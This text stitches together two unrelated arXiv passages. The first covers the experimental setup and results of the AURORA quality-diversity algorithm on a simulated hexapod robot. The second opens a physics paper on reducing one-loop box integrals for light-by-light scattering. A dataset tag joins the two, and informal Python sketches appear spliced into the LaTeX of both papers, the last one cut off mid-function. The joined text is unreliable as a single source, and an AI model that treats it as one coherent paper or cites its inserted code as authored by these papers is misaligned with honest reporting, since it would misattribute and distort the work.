In the end, the two phases of AURORA successively (1)~train the encoder to minimise the difference between the entropy of the state trajectories $\entropy{\vec s_{1:T}}$ and its lower bound $\entropy{\mathcal{E} (\vec s_{1:T})}$, and~(2) run QD iterations to maximise the lower bound $\entropy{\vec b_{\encoder}} = \entropy{\mathcal{E} (\vec s_{1:T})}$.
This intuitively explains why AURORA can be used to maximise the diversity of full-state trajectories $\vec s_{1:T}$.
\input{figures/graphical_models/all-diagrams-qd-aurora}
\section{Experimental Setup}
\subsection{Agent: Neural-network controlled hexapod}
In all our experiments, our agent consists of a simulated hexapod robot controlled via a neural network controller.
The hexapod robot presents 18 controllable joints (3 per leg).
Each leg $l$ has two Degrees of Freedom: its hip angle $\alpha_l$ and its knee angle $\beta_l$.
The ankle angle is always set to the opposite of the knee angle.
The neural network controller is a Multi-Layer Perceptron with a single hidden layer of size 8.
It takes as input the current joint angles and velocities $(\alpha_l, \beta_l, \dot{\alpha}_l, \dot{\beta}_l)_{1\leq l \leq 6}$ (of dimension 24), and outputs the target values to reach for the joint angles $(\alpha_l, \beta_l)_{1\leq l \leq 6}$ (of dimension 12).
The controller has in total $(24+1)*8 + (8+1)*12 = 308$ independent parameters, operates at a frequency of $50$Hz, while each episode lasts for 3 seconds.
The environment and the controller are deterministic.
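A minimal sketch of such a controller is given below; the tanh activation and the uniform initialisation are our own assumptions, as the text does not specify them. The parameter count matches the $(24+1)\times 8 + (8+1)\times 12 = 308$ stated above:

```python
import math
import random

# Minimal sketch of the controller described above: one hidden layer of
# size 8, mapping the 24-D joint state to 12 target joint angles.
IN, HID, OUT = 24, 8, 12

def init_params(rng=random.Random(0)):
    rnd = lambda: rng.uniform(-1.0, 1.0)
    W1 = [[rnd() for _ in range(IN)] for _ in range(HID)]
    b1 = [rnd() for _ in range(HID)]
    W2 = [[rnd() for _ in range(HID)] for _ in range(OUT)]
    b2 = [rnd() for _ in range(OUT)]
    return W1, b1, W2, b2

def forward(params, x):
    W1, b1, W2, b2 = params
    h = [math.tanh(sum(w * xi for w, xi in zip(row, x)) + b)
         for row, b in zip(W1, b1)]
    return [math.tanh(sum(w * hi for w, hi in zip(row, h)) + b)
            for row, b in zip(W2, b2)]

n_params = (IN + 1) * HID + (HID + 1) * OUT
print(n_params)   # 308, matching the count stated in the text
```

In a QD setting, the 308 weights and biases form the genotype $\vec\theta$ that undergoes mutation.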
\subsection{Dimensionality Reduction Algorithm of AURORA{}}
For each evaluated policy, the state trajectory corresponds to the joint positions, and torso positions and orientations collected at a frequency of 10Hz.
In the end, this represents 18 streams ($(\alpha_i, \beta_i)_{i=1\ldots 6}$, and the positional and rotational coordinates of the torso), with each of those streams containing 30 measurements.
The dimensionality reduction algorithm used in AURORA{} is a reconstruction-based auto-encoder.
The encoder processes the input data with two 1D convolutional layers, each with 128 filters and a kernel of size 3.
Those convolutional layers are followed by one fully-connected linear layer of size 256.
The decoder is made of a fully-connected linear layer of size 256, followed by three 1D deconvolutions with respectively 128, 128 and 18 filters.
The loss function used to train the Encoder corresponds to the mean squared error between the observation passed as input and the reconstruction obtained as output.
The training is performed using the Adam gradient-descent optimiser \citep{kingma2014adam} with $\beta_1=0.9$ and $\beta_2 = 0.999$.
As the encoder needs to be updated less and less frequently as the number of iterations increases, the number of iterations between two encoder updates is linearly increased over time: if the first encoder update happens at iteration 10, then the following updates occur at iterations 30, 60, 100, and so on.
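This schedule can be made concrete with a minimal sketch (the function name and the linearly growing gap rule below are our own reading of the text, not code from the paper):

```python
def encoder_update_schedule(first=10, n_updates=4):
    """Iterations at which the encoder is retrained, assuming the gap
    between consecutive updates grows linearly (20, 30, 40, ...)."""
    iterations, t, gap = [], first, 2 * first
    for _ in range(n_updates):
        iterations.append(t)
        t += gap      # next update happens `gap` iterations later
        gap += first  # the gap itself grows linearly over time
    return iterations

# encoder_update_schedule() -> [10, 30, 60, 100], matching the example above.
```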
\subsection{QD Tasks}
For the hexapod environment, we consider different types of QD Tasks.
A QD task evaluates the diversity and the performance of policies present in the container returned by a QD algorithm.
Each QD task is characterised by a performance score function $\vec \theta \mapsto f(\vec \theta)$, and a BD function $\vec \theta\mapsto \vec b_{\cT}(\vec \theta)$ (where $\vec \theta$ represents the policy parameters).
We consider three QD tasks with the hexapod agent: Navigation (Nav), Moving Forward (Forw), and Half-roll (Roll).
\subsubsection{Navigation (Nav)}
The Navigation task is inspired by \citet{chatzilygeroudis2018reset} and \citet{kaushik2020adaptive}.
This task aims at finding a container of controllers reaching diverse final $(x_T, y_T)$ positions in $T=3$ seconds following circular trajectories.
Hence the hand-coded BD in this case is $\vec b_{\cT} = (x_T, y_T)$, while the performance $f$ is the final orientation error as defined in the literature~\citep{Cully2013,chatzilygeroudis2018reset}.
\subsubsection{Moving Forward (Forw)}
The Moving Forward task is inspired by the work of \citet{Cully2014robotsanimals}, which aims to obtain a container with a variety of ways to move forward at a high velocity.
The hand-coded BD associated with that task, $\vec b_{\cT}$, is the Duty Factor, which
evaluates the proportion of time each leg is in contact with the ground.
The performance score promotes solutions achieving the highest $x$ position at the end of the episode: $f = x_T$.
\subsubsection{Half-roll (Roll)}
The Half-roll QD task aims at finding a diversity of ways to perform half-rolls, i.e.\ behaviours such that the hexapod ends with its back on the floor (where the pitch angle of the torso is approximately equal to $-\frac{\pi}{2}$).
In particular, the behaviours are characterised via the final yaw and roll angles of the torso, and the performance is measured as the distance between the final pitch angle $\alpha^{pitch}_T$ of the hexapod and $-\frac{\pi}{2}$:
\begin{equation}
\vec b_{\cT} = \left(\alpha^{yaw}_{T}, \alpha^{roll}_{T} \right) \quad
f = - \left\lvert \alpha^{pitch}_{T} - \left(-\frac{\pi}{2}\right) \right\rvert
\end{equation}
\subsection{Metric: Coverage per Minimum Performance}
\label{sec:cov_per_min_fit}
The containers returned by any QD algorithm always result in a trade-off between the diversity and the total performance of the solutions from the container.
%
To evaluate the coverage depending on the quality of the solutions, we study the evolution of the coverage given several minimum performance scores.
%
Given a minimum performance $f_{min}$ and a BD space discretised into a grid, we define the \textit{\say{coverage given minimum performance $f_{min}$}} as the number of cells filled with policies whose performance is higher than $f_{min}$.
The coverage is calculated by discretising the task Behavioural Descriptor (BD) space~$\B_\cT$ into a $50\times 50$ grid.
%
The coverage then corresponds to the number of grid cells containing at least one policy from the unstructured container.
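As an illustration, this metric can be sketched as follows (a hypothetical implementation we wrote for clarity; it assumes a two-dimensional BD space with the same scalar bounds on both dimensions, and all names are ours):

```python
import numpy as np

def coverage_given_min_perf(bds, perfs, f_min, lo=0.0, hi=1.0, n_cells=50):
    """Count grid cells (n_cells x n_cells discretisation of the BD space)
    containing at least one policy whose performance is >= f_min."""
    bds = np.asarray(bds, dtype=float)
    perfs = np.asarray(perfs, dtype=float)
    kept = bds[perfs >= f_min]
    if kept.size == 0:
        return 0
    # Map each kept BD to an integer cell index along every dimension.
    cells = np.floor((kept - lo) / (hi - lo) * n_cells).astype(int)
    cells = np.clip(cells, 0, n_cells - 1)
    return len({tuple(c) for c in cells})
```

Sweeping $f_{min}$ over a range of values then produces one coverage curve per algorithm, as plotted in Figure~\ref{fig:iclr_02_cov_per_min_fit}.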
\subsection{Compared algorithms and variants}
We compare AURORA (see Section~\ref{subsec:unsupervised_behaviours}), to two different variants having hand-defined BDs: Hand-Coded-$x$ (HC-$x$) and Mean Streams (MeS).
\textbf{Hand-Coded-$x$ (HC-$x$)}: considers a low-dimensional BD that is defined by hand as the BD of the QD task $x$, where $x$ can correspond to any QD task (Navigation, Moving Forward or Half-roll).
The HC variant corresponds to a standard QD algorithm with an unstructured archive~\citep{Cully2018QDFramework} and the mechanism of container size control introduced in previous work \citep{grillotti2021unsupervised}.
\textbf{Mean Streams (MeS)}: uses a BD that encompasses more information from the full-state trajectory than the Hand-Coded variant detailed above.
The BD used by this variant considers the 18 data streams collected by the hexapod and averages each of those streams to obtain a BD of dimension 18.
The comparison between this variant and AURORA{} makes it possible to evaluate the utility of the automatic dimensionality reduction algorithm.
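A minimal sketch of the MeS descriptor (our own illustration; it assumes the trajectory is stored as a 30-by-18 array of measurements, one row per time step):

```python
import numpy as np

def mean_streams_bd(state_trajectory):
    """Hypothetical sketch of the MeS descriptor: average each of the 18
    sensory streams over its 30 time steps, giving an 18-dimensional BD."""
    traj = np.asarray(state_trajectory, dtype=float)  # shape (30, 18)
    assert traj.shape == (30, 18)
    return traj.mean(axis=0)                          # shape (18,)
```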
\subsection{Implementation Details}
All our experiments were run for 15{,}000 iterations with a uniform QD selector.
We only use polynomial mutations \citep{deb1999nichedpolynomialmutation} as variation operators with $\eta_m = 10$, and a mutation rate of $0.3$.
The target container size for all algorithms is set to $N_{\cC}^{target}=5{,}000$ for the Moving Forward and the Half-roll tasks.
In the case of the Navigation Task, we set this number to $N_{\cC}^{target}=1{,}500$ to obtain appropriate comparisons between the different approaches.
To keep the container size around $N_{\cC}^{target}$, we perform a container update every $T_{\mathcal{C}} = 10$ iterations (as explained in Section~\ref{sec:background_qd}).
All our implementation is based on Sferes$_{\text{v2}}$ \citep{Mouret2010}
and uses the DART simulator \citep{lee2018dart}, while the auto-encoders are implemented and trained using the C++ API of PyTorch \citep{paszke2019pytorch}.
For each QD task, all variants were run for 10 replications.
\section{Results}
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/iclr/01_iclr_archives.pdf}
\caption{Containers returned by the different variants (columns) for each Quality-Diversity task (rows).
%
Each dot corresponds to one policy present in the container, after projection in the Behavioural Descriptor space $\B_\cT$ of the QD task.
%
The colour of each dot is representative of the performance score of the policy.
%
If the container results from a Hand-Coded variant that is not associated with the task (e.g.\ the container generated by HC-Nav for the Half-roll task), then the solutions are shown in grey.
%
Also, note that since the BD space of Duty Factors (second row) has six dimensions, the containers are presented using the same type of grids as in the work of \citet{Cully2014robotsanimals}.
}
\label{fig:iclr_01_archives}
\end{figure}
\begin{figure}
\centering
\includegraphics[width=\textwidth]{figures/iclr/02_iclr_coverage_per_fitness.pdf}
\caption{Coverage per minimum performance (presented in section~\ref{sec:cov_per_min_fit}), considered with all downstream tasks under study.
%
If the container results from a Hand-Coded variant that is not associated with the task (e.g.\ the container generated by HC-Forw for the Navigation task), then the performance of the solutions is not considered, and only the total coverage is presented.
%
The vertical dashed line shows where to read the total coverage (without any minimal performance) achieved by each variant.
%
For each variant, the bold line represents the median coverage; and the shaded area indicates the interquartile range.
}
\label{fig:iclr_02_cov_per_min_fit}
\end{figure}
Our objective is to show that AURORA discovers diversity in all directions of the BD space.
To that end, we take the containers returned by the different algorithms and project them into the BD spaces associated with each Quality-Diversity (QD) task.
Then we evaluate the achieved coverage in the BD space by considering the coverage for several minimum performance scores.
From Figure~\ref{fig:iclr_02_cov_per_min_fit}, it can be noticed that AURORA systematically obtains a lower total coverage than the variant using the hand-coded BD of the task (e.g. HC-Forw for the Forward task).
Such variants use a BD that is well-adapted to the QD problem at hand, but this kind of BD requires human expertise to be defined.
AURORA{} can also be compared to Hand-Coded containers after a projection into the BD spaces of other tasks, such as the container from HC-Nav projected into the BD space of the Moving Forward task.
We notice that those containers (shown in grey in Figs~\ref{fig:iclr_01_archives} and~\ref{fig:iclr_02_cov_per_min_fit}) achieve a coverage that is at best equivalent to, and often worse than, that of the containers of AURORA.
For example, in the Half-roll task, the Hand-Coded baselines HC-Nav and HC-Forw do not find any solution making the hexapod fall on its back, whereas AURORA discovers such behaviours (see the corners of the Half-roll containers in Fig.~\ref{fig:iclr_01_archives}).
In the end, AURORA manages to find containers of behaviours exhibiting diversity in all BD spaces.
The MeS variant, whose BD corresponds to the mean of each stream of sensory data, does not provide the same level of efficiency as AURORA.
In the three tasks, AURORA obtains a coverage that is higher or equal to the coverage obtained for MeS (Fig.~\ref{fig:iclr_02_cov_per_min_fit}).
When considering high minimum performance, the gap between the coverages from AURORA and MeS is even more apparent.
This suggests that the automatic definition of an unsupervised BD may improve performance over hand-defined BDs, even when those are computed from all the full states of the robot.
In the end, by considering the entire full-state trajectory of the agent, AURORA can learn a large diversity of skills in an unsupervised manner, which is more general than any of the compared methods.
\section{Conclusion and Future Work}
In this paper, we provided an additional analysis of AURORA, a QD algorithm that automatically defines its BDs.
In that analysis, we studied what kind of behaviours emerge when AURORA encodes the full-state trajectory of a hexapod robot.
Our experimental evaluation demonstrated that AURORA{} autonomously finds diverse types of behaviours such as: navigating to different positions, using its legs in different manners, and performing half-rolls.
In order to limit the computational complexity of AURORA, the container is forced to have a limited size (usually of the order of magnitude of 10{,}000 policies).
This property may prevent the algorithm from exploring in detail all the different types of behaviours in open-ended environments.
For example, it would be interesting to simultaneously obtain a complete behavioural sub-container specialised in half-rolls, and another sub-container specialised in navigation.
This problem has been efficiently addressed by \citet{etcheverry2020imgepholmes} with IMGEP-HOLMES, an algorithm that manages to discover several specialised niches of behaviours.
It would be interesting to study how AURORA could integrate the same mechanisms as IMGEP-HOLMES to handle open-endedness.
It would also be relevant to try our approach on more open-ended problems, where the robot can interact with various objects and other robots.
proofpile-arXiv_065-9827 | \section{Introduction}
In ref.~\cite{Tarasov:2022clb} a method for functional
reduction of one-loop integrals with arbitrary masses and external
momenta was proposed.
In the present article I will describe the application of this method
for calculating one-loop integrals that arise when computing radiative
corrections to important physical processes.
As an example, I chose to calculate integrals required for
radiative corrections to the amplitudes of scattering of light by
light, photon splitting in an external field and Delbr\"{u}ck
scattering.
First calculations of radiative corrections to these
processes were presented in refs.
\cite{Karplus:1950zz}--\cite{Constantini:1971}.
Radiative corrections to the amplitude of the photon splitting in an external
field were considered in refs. \cite{Shima:1966cmi}, \cite{Baier:1974ga}.
Electroweak radiative corrections to the process of
photon-photon scattering were investigated in refs.
\cite{Jikia:1993tc}, \cite{Gounaris:1999gh}.
The study of the scattering of light by
light is an important part of the experimental program at the LHC.
The main experiment in this study is collisions of lead ions.
The first results of these experiments were reported in refs.
\cite{ATLAS:2017fur}, \cite{CMS:2018erd}.
The aim of this paper is to calculate integrals that arise when computing
amplitudes for the processes with four external photons.
Note that integrals of this type can be used to calculate
radiative corrections to other processes, as well as to calculate
diagrams with five or more external lines that can be reduced
to the considered integrals.
\section{Integrals and the functional reduction formula}
We will consider the calculation of integrals of the following type
\begin{equation}
I_4^{(d)}(m_1^2,m_2^2,m_3^2,m_4^2;
s_{12},s_{23},s_{34},s_{14},s_{24},s_{13})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2D_3D_4},
\end{equation}
where
\begin{equation}
D_j=(k_1-p_j)^2-m_j^2+i\epsilon,~~~~~~~~s_{ij}=(p_i-p_j)^2.
\label{product4P}
\end{equation}
In what follows, we will omit the small imaginary term $i\epsilon$,
implying that all the masses contain it.
Figure 1 shows diagrams corresponding to the integrals
that we consider in this paper.
\vspace{0.5cm}
\begin{figure}[h]
\begin{center}
\includegraphics[scale=0.9]{boxes4_lin}
\end{center}
\caption{
Diagrams corresponding to scattering of light by light,
photon splitting and Delbr\"{u}ck scattering.
The thick lines correspond to the off-shell photon. }
\end{figure}
To calculate the integral $I_4^{(d)}$, we will need
integrals with fewer propagators:
\begin{eqnarray}
&&
I_3^{(d)}(m_1^2,m_2^2,m_3^2; s_{23},s_{13},s_{12})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2D_3},
\\
&&
I_2^{(d)}(m_1^2,m_2^2; s_{12})
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1D_2},
\\
&&I_1^{(d)}(m_1^2)
=\frac{1}{i \pi^{d/2}} \int \frac{d^dk_1}{D_1}.
\end{eqnarray}
The formula for functional reduction of the integral $I_4^{(d)}$ with
arbitrary masses and kinematic variables
\cite{Tarasov:2022clb} can be represented as,
\begin{eqnarray}
&&I_4^{(d)}(m_1^2,m_2^2,m_3^2,m_4^2; s_{12},s_{23},s_{34},s_{14},s_{24},s_{13})
\nonumber \\
&&~~~~~~~~~~~~~~~~~~~~~~~~~~~~
=
\sum_{k=1}^{24} Q_k
{ B_4^{(d)}(}R^{(k)}_{1},R^{(k)}_{2},R^{(k)}_{3},R^{(k)}_{4}),
\label{I4viaB4}
\end{eqnarray}
where $R^{(k)}_{j}$ are the ratios of the modified Cayley determinant
to the Gram determinant, $Q_k$ are products of the ratios
of polynomials in the squared masses and kinematic variables $s_{ij}$.
The function $B_4^{(d)}$ is defined as follows
\begin{eqnarray}
&&{ B_4^{(d)}(R_1,R_2,R_3,R_4)} \nonumber \\
&&
~~~=I_4^{(d)}(R_1,R_2,R_3,R_4; R_2\!-\!R_1,R_3\!-\!R_2,R_4\!-\!R_3,
R_4\!-\!R_1, R_4\!-\!R_2,R_3\!-\!R_1)
\nonumber \\
&&~~~=\Gamma\left(4-\frac{d}{2}\right)
R_1^{\frac{d}{2}-4}
\int_0^1\int_0^1\int_0^1x_1^2x_2~h_4^{\frac{d}{2}-4} dx_1dx_2dx_3,
\label{int_rep_B4}
\end{eqnarray}
\begin{equation*}
h_4=1-z_1 x_1^2- z_2 x_1^2x_2^2
-z_3 x_1^2x_2^2x_3^2.
\end{equation*}
The variables $z_j$ are simple combinations of $R_i$
\begin{equation}
z_1=1-\frac{R_{2}}{R_{1}},~~~~z_2=\frac{R_{2}-R_{3}}{R_{1}},
~~~~z_3=\frac{R_{3}-R_4}{R_{1}}.
\end{equation}
An explicit formula for the functional reduction of the integral $I_4^{(d)}$
is presented in \cite{Tarasov:2022clb}.
\section{Integral $I_4^{(d)}$ for the light by light scattering amplitude }
The integral required for computing the
light by light scattering amplitude corresponds to the following
values of kinematic variables and masses
\begin{equation}
s_{12}=s_{23}=s_{34}=s_{14}=0,~~~~~~m_j^2=m^2, ~~~~j=1,...,4.
\label{LbyL}
\end{equation}
Inserting these values in the final formula for functional
reduction of the integral $I_4^{(d)}$, given in
\cite{Tarasov:2022clb}, we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
=
\nonumber \\
&&~~~~~~~~~~~~~~~
\frac{\tilde{s}_{13}}{(\tilde{s}_{24}+\tilde{s}_{13})} L^{(d)}(\tilde{s}_{13},M_2^2,m^2)
+\frac{\tilde{s}_{24}}{(\tilde{s}_{24}+\tilde{s}_{13})} L^{(d)}(\tilde{s}_{24},M_2^2,m^2),
\label{boxLbyL}
\end{eqnarray}
where
\begin{eqnarray}
&&L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)=
\nonumber \\
&&~~~~~~
I_4^{(d)}\left( m^2-M_2^2, m^2,m^2- \tilde{s}_{ij},m^2;M^2_2,-\tilde{s}_{ij},\tilde{s}_{ij},
M^2_2 ,0,M^2_2-\tilde{s}_{ij} \right),~~~~~
\end{eqnarray}
\begin{equation}
M^2_2=\frac{\tilde{s}_{24}\tilde{s}_{13}}{(\tilde{s}_{24}+\tilde{s}_{13})},~~~~~~~\tilde{s}_{ij}=\frac{s_{ij}}{4}.
\end{equation}
The resulting formula (\ref{boxLbyL}) represents the integral $I_4^{(d)}$ depending on three variables
in terms of integrals also depending on three variables.
However, calculating the integral $L^{(d)}$ is simpler than calculating
the original integral.
We will consider different methods of calculating $L^{(d)}$.
It turns out that the recurrence equation with respect to
$d$ provides an easy way to derive a compact expression
for the function $L^{(d)}$.
Such an equation
for the integral $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$ has the form
\cite{Tarasov:2022clb}:
\begin{equation}
(d-3)L^{(d+2)}(\tilde{s}_{ij},M_2^2,m^2)
=-2 m^2_0 L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)-I_3^{(d)}(m^2;\tilde{s}_{ij}),
\label{dim_rec_os}
\end{equation}
where
\begin{equation}
I_3^{(d)}(m^2;\tilde{s}_{ij})=
I_3^{(d)}(m^2,m^2-\tilde{s}_{ij},m^2; \tilde{s}_{ij},0,-\tilde{s}_{ij}),
\end{equation}
\begin{equation}
m_0^2= m^2-M_2^2.
\end{equation}
The solution of the equation (\ref{dim_rec_os}) can be represented
as
\begin{eqnarray}
&&
L^{(d)}(\tilde{s}_{ij},M^2_2,m^2)
\nonumber \\
&&~~~~~~~
=
\frac{(m_0^2)^{\frac{d}{2}} ~c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)}
{\Gamma\left(\frac{d-3}{2}\right) \sin \frac{\pi d}{2}}
-\frac{1}{2m_0^2}\sum_{r=0}^{\infty}
\frac{\left(\frac{d-3}{2}\right)_r}{(-m_0^2)^r}
I_3^{(d+2r)}(m^2;\tilde{s}_{ij}),
\label{solu_dim_rec}
\end{eqnarray}
where
$c_4^{(d+2)}(\tilde{s}_{ij},M^2_2,m^2)=c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)$
is an arbitrary periodic function of the parameter $d$.
Using the method of ref. \cite{Tarasov:2015wcd}, we obtained for the integral
$I_3^{(d)}(m^2;\tilde{s}_{ij})$ a simple functional relation
\begin{equation}
I_3^{(d)}(m^2;\tilde{s}_{ij})=
I_3^{(d)}(m^2,m^2,m^2; 4\tilde{s}_{ij},0,0),
\end{equation}
which reduces this integral to the well-known result \cite{Boos:1990rg}
\begin{eqnarray}
I_3^{(d)}(m^2;\tilde{s}_{ij})
=
- \frac{(m^2)^{\frac{d}{2}-3}}{2} \Gamma\left(3-\frac{d}{2}\right)
\Fh32\Fds{1,1,3-\frac{d}{2}}{2,\frac{3}{2}}.
\label{I3small_Mom}
\end{eqnarray}
We find the function $c_4^{(d)}(\tilde{s}_{ij},M^2_2,m^2)$ as a solution
of a differential equation that can be obtained, for example,
from a differential equation
for the integral $L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)$
\begin{eqnarray}
&&\tilde{s}_{ij}\frac{\partial}{\partial \tilde{s}_{ij}}
L^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = -L^{(d)}(\tilde{s}_{ij},M_2^2,m^2)
\nonumber \\
&&~~~~~~~~~~~~~~~
+\frac{(d-3)}{8(M_2^2-\tilde{s}_{ij})(M_2^2-m^2)}I^{(d)}_2(m^2-M_2^2,m^2;M_2^2)
\nonumber \\
&&~~~~~~~~~~~~~~~
-\frac{(d-3)}{8(M_2^2-\tilde{s}_{ij})(\tilde{s}_{ij}-m^2)}
I_2^{(d)}(m^2-\tilde{s}_{ij},m^2;\tilde{s}_{ij})
\nonumber \\
&&~~~~~~~~~~~~~~~
+\frac{(d-2)}{16m^2(\tilde{s}_{ij}-m^2)(M_2^2-m^2)}I_1^{(d)}(m^2).
\label{proI4_S13}
\end{eqnarray}
This equation was obtained under the assumption that $\tilde{s}_{ij}$ and $M_2^2$
are independent variables.
Substituting the solution (\ref{solu_dim_rec}) into the equation (\ref{proI4_S13}),
we get a simple differential equation
\begin{equation}
\tilde{s}_{ij}\frac{\partial c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)}
{\partial \tilde{s}_{ij}}+c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)=0.
\label{dif_equ4c4}
\end{equation}
The solution of this equation is
\begin{equation}
c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2)
= \frac{\tilde{c}_4^{(d)}(M_2^2,m^2)}{\tilde{s}_{ij}},
\end{equation}
where $\tilde{c}_4^{(d)}(M_2^2,m^2)$ is the integration constant
of the differential equation (\ref{dif_equ4c4}).
Using the boundary value of the integral $L^{(d)}$ at $\tilde{s}_{ij}=0$, we get
\begin{equation}
c_4^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = 0.
\label{c4zero}
\end{equation}
For the hypergeometric function from the equation (\ref{I3small_Mom}),
we used the following representation \cite{rainville1960special}
\begin{eqnarray}
\Fh32\Fx{1,1,3-\frac{d}{2}}{2,\frac{3}{2}}=\frac{-\Gamma\left(\frac32\right)}
{x \Gamma\left(3-\frac{d}{2}\right) \Gamma\left(\frac{d-3}{2}\right)}
\int_0^1 dz z^{\frac{2-d}{2}}(1-z)^{\frac{d-5}{2}}
\ln(1-xz).~~~~
\label{I3intrepr}
\end{eqnarray}
Employing this representation and taking into account equation (\ref{c4zero}),
the solution (\ref{solu_dim_rec}) can be written as
\begin{eqnarray}
L^{(d)}(\tilde{s}_{ij},M_2^2,m^2) = -
\frac{\pi^{\frac12}(m^2)^{\frac{d}{2}-3}}
{8\tilde{s}_{ij}\Gamma\left(\frac{d-3}{2}\right)}
\int_0^1 \frac{dz ~z^{2-\frac{d}{2}}(1-z)^{\frac{d-5}{2}}}
{1-z\frac{M_2^2}{m^2}}\ln\left(1-z\frac{\tilde{s}_{ij}}{m^2}\right).
\label{I4_LbyL}
\end{eqnarray}
Substituting this expression into the equation (\ref{boxLbyL}), we get
\begin{eqnarray}
&&I_4^{(d)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
=
-\frac{\pi^{\frac12}(m^2)^{\frac{d}{2}-3}}
{2(s_{24}+s_{13})\Gamma\left(\frac{d-3}{2}\right)}
~~~~~~~~~~~
\nonumber \\
&& ~~~~~~~~~~\times
\int_0^1 \frac{dz ~z^{2-\frac{d}{2}}(1-z)^{\frac{d-5}{2}}}
{1-z\frac{M_2^2}{m^2}}
\left[ \ln\left(1-z\frac{s_{13}}{4m^2}\right)+
\ln\left(1-z\frac{s_{24}}{4m^2}\right) \right].~~~
\label{SumI_LbL}
\end{eqnarray}
This is the simplest representation known so far
for this integral. Note that for $d=4$ in ref.
\cite{Davydychev:1993ut}, this integral was obtained
in terms of the hypergeometric Appell function $F_3$,
which was expressed as a two-fold integral.
The representation (\ref{I4_LbyL}) is convenient for
a series expansion in $\varepsilon =(4-d)/2$. For $d=4$, we have
\begin{eqnarray}
L^{(4)}(\tilde{s}_{ij},M_2^2,m^2)=
\frac{-1}{8M_2^2{s}_{ij}\beta_{2}}
\left[
\ln^2\frac{\beta_{ij}+1}{\beta_{2}-\beta_{ij}}
-\frac12 \ln^2\frac{\beta_{2}-\beta_{ij}}{\beta_{2}+\beta_{ij}}
-\ln \frac{\beta_{ij}-1}{\beta_{ij}+1}
\ln\frac{\beta_{2}-\beta_{ij}}{\beta_{2}+\beta_{ij}}
\right.
\nonumber \\
\nonumber \\
\left.
+\frac{\pi^2}{3}
+2\Sp{\frac{\beta_{ij}-\beta_{2}}{\beta_{ij}+1}}
-2\Sp{\frac{\beta_{ij}-1}{\beta_{2}+\beta_{ij}}}
+\Sp{\frac{\beta_{ij}^2-1}{\beta_{ij}^2-\beta_{2}^2}}
\right].~~~~~~~~
\label{I_LbL}
\end{eqnarray}
where
\begin{equation}
\beta_{ij} \equiv \sqrt{1- \frac{m^2}{\tilde{s}_{ij}}},~~~~(ij=13,24) \; \;~~~~~~~~~~~
\beta_{2} \equiv \sqrt{1-\frac{m^2}{M_2^2}}. \;
\label{Betass}
\end{equation}
Using (\ref{I_LbL}), from the equation (\ref{boxLbyL}),
we get
\begin{eqnarray}
&&I_4^{(4)}(m^2,m^2,m^2,m^2; 0,0,0,0,s_{24},s_{13})
\nonumber \\ [0.3 cm]
&& = \frac{1}{8\tilde{s}_{13}\tilde{s}_{24} \beta_{2}}
\left\{ 2 \ln^2
\left( \frac{\beta_{2}+\beta_{13}}{\beta_{2}+\beta_{24}} \right)
+ \ln \left( \frac{\beta_{2}-\beta_{13}}{\beta_{2}+\beta_{13}} \right) \;
\ln \left( \frac{\beta_{2}-\beta_{24}}{\beta_{2}+\beta_{24}} \right)
- \frac{\pi^2}{2} \right. \hspace{1cm}
\nonumber \\
&& \left.
+\sum_{i=13,24}^{} \left[
2 \Sp{\frac{\beta_{i} -1}{\beta_{2}+\beta_i}}
-2 \Sp{-\frac{\beta_{2}-\beta_i}{\beta_{i} +1}}
- \ln^2
\left( \frac{\beta_{i} +1}{\beta_{2}+\beta_i} \right)
\right] \right\}.~~~~~~~~~
\label{I4eps0}
\end{eqnarray}
In the sum of the two $L^{(d)}$ functions, the third terms with ${\rm Li}_2$ from (\ref{I_LbL}) cancel.
The expression (\ref{I4eps0}) agrees with the result obtained in
ref. \cite{Davydychev:1993ut}.
The function $L^{(d)}$ can be obtained as a solution to the equation (\ref{proI4_S13}).
For $d=4$, the solution of this equation has the form
\begin{eqnarray}
&&L^{(4)}(\tilde{s}_{ij},M_2^2,m^2) =
\frac{1}{8s_{ij}M_2^2 \beta_2}
\Biggl[F(y_{ij},y_2)
-2{\rm Li_2}\left(1- y_2\right)
\Biggr],~~~~~~
\label{best_I4LbL}
\end{eqnarray}
where
\begin{equation}
F(y_{ij},y_k)={\rm Li}_2\left(1-y_{ij}y_k\right)+
{\rm Li}_2\left(1-\frac{y_k}{y_{ij}}\right)+\frac12 \ln^2y_{ij},
\end{equation}
\begin{equation}
y_{ij}=\frac{\beta_{ij}-1}{\beta_{ij}+1},~~~~~~y_{2}=\frac{\beta_{2}-1}{\beta_{2}+1}.
\end{equation}
Note that the expression (\ref{best_I4LbL}) is invariant both with respect to the replacement $y_{ij}\rightarrow 1/y_{ij}$ and with respect to the replacement $y_{2}\rightarrow 1/y_{2}$.
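The invariance under $y_{ij}\rightarrow 1/y_{ij}$ can also be verified numerically: the replacement exchanges the arguments of the two dilogarithms in $F$ and leaves $\ln^2 y_{ij}$ unchanged. The following self-contained Python sketch (our own illustration, not part of the derivation; it implements the dilogarithm by Simpson-rule quadrature) checks this at an arbitrary test point:

```python
import math

def li2(x, n=4000):
    """Dilogarithm Li2(x) = -int_0^x ln(1-t)/t dt for x <= 1 (Simpson's rule)."""
    f = lambda t: 1.0 if t == 0.0 else -math.log(1.0 - t) / t
    h = x / n  # n must be even for Simpson's rule; works for x < 0 as well
    s = f(0.0) + f(x)
    for k in range(1, n):
        s += (4 if k % 2 else 2) * f(k * h)
    return s * h / 3.0

def F(y, yk):
    # F(y, yk) = Li2(1 - y*yk) + Li2(1 - yk/y) + (1/2) ln^2 y
    return li2(1 - y * yk) + li2(1 - yk / y) + math.log(y) ** 2 / 2

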